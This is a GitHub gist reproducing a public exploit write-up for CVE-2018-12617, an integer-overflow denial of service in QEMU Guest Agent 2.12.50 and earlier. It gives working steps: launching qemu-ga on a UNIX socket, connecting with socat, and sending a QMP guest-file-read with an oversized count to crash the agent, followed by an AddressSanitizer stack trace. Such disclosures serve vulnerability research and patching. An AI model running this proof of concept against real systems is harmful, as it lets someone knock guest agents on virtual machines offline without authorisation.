Skip to content

Instantly share code, notes, and snippets.

Created June 21, 2018 17:07
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
# Exploit Title: QEMU Guest Agent Denial of Service
# Date: 2018-06-07
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage:
# Software Link:
# Version: 2.12.50 and earlier
# Tested on: 2.12.50
# CVE : CVE-2018-12617
QEMU Guest Agent 2.12.50 and earlier has an integer overflow causing a g_malloc0() call to trigger a segfault() call when trying to allocate a large memory chunk. The vulnerability can be exploited by sending a specific QMP command to the agent via the listening socket.
1st, execute the guest-agent using the following command:
$ qemu-ga -m unix-listen -p /tmp/qga.sock -t /tmp
2nd, on the other console, connect to the UNIX socket using socat:
$ socat unix-connect:/tmp/qga.sock -
3rd, enter the following QMP command:
{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+”}}
{"return": 1000}
{"execute":"guest-file-read", "arguments":{"handle":1000,"count":4294967295}}
The guest-file-read must be specified with the correct handle value (file descriptor). Different files will have different handle value.
#0 0x5598eed0a1af in calloc /home/user/llvm/projects/compiler-rt/lib/asan/
#1 0x7f2ce5d7d770 in g_malloc0 (/lib/x86_64-linux-gnu/
#2 0x5598eed84996 in qmp_marshal_guest_file_read /home/user/qemu/qga/qapi-generated/qga-qapi-commands.c:425:14
#3 0x5598eeda4fcf in do_qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:119:5
#4 0x5598eeda4fcf in qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:168
#5 0x5598eed59bff in process_command /home/user/qemu/qga/main.c:589:11
#6 0x5598eed59bff in process_event /home/user/qemu/qga/main.c:626
#7 0x5598eedb5f13 in json_message_process_token /home/user/qemu/qobject/json-streamer.c:105:5
#8 0x5598eee25d9b in json_lexer_feed_char /home/user/qemu/qobject/json-lexer.c:323:13
#9 0x5598eee25333 in json_lexer_feed /home/user/qemu/qobject/json-lexer.c:373:15
#10 0x5598eed5a95e in channel_event_cb /home/user/qemu/qga/main.c:659:9
#11 0x5598eed710c1 in ga_channel_client_event /home/user/qemu/qga/channel-posix.c:92:23
#12 0x7f2ce5d78049 in g_main_context_dispatch (/lib/x86_64-linux-gnu/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment